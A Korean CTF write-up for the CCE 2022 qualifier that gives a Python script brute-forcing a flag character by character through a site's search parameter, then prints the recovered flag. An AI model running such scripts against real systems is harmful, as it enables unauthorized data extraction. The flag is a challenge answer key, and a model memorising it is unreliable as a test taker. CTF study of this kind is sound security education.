-
option=content&searchWrd=cce2022{ 는 flag 형식이 cce2022{플래그} 임으로 충분히 게싱 가능했고 내용을 검색하기 위해서 title에서 content로 바꿔주었다. 플래그 뒷 부분은 파이썬 스크립트로 브루트 포싱해보면 나온다.
import requests import string url = "http://3.36.61.250/?option=content&searchWrd=cce2022{" flag = "cce2022{" def get_flag(url,flag): while True: for i in string.printable: if i == "#" or i == "%" or i == "&" or i == "_": continue res = requests.get(url=url+i) print("Try " + url + i) if "2022 CCE CTF held" in res.text: url += i flag += i break if i == "}": print("FLAG : "+flag) break if __name__ == "__main__": get_flag(url,flag)
Flag : cce2022{0f9f1a2e61641f9c54d488f8c4fc22bd}
원래는 SQL Injection 문제였다고 한다..┏(ºдº)┛
그렇다고 한다.
'CTF > Cyber Conflict Exercise 2022' 카테고리의 다른 글
[CCE 2022 Qualifier] Request forgery (0) 2022.09.25 [CCE 2022 Qualifier] Login me (0) 2022.09.25 [CCE 2022 Qualifier] Auth Token (0) 2022.09.24 댓글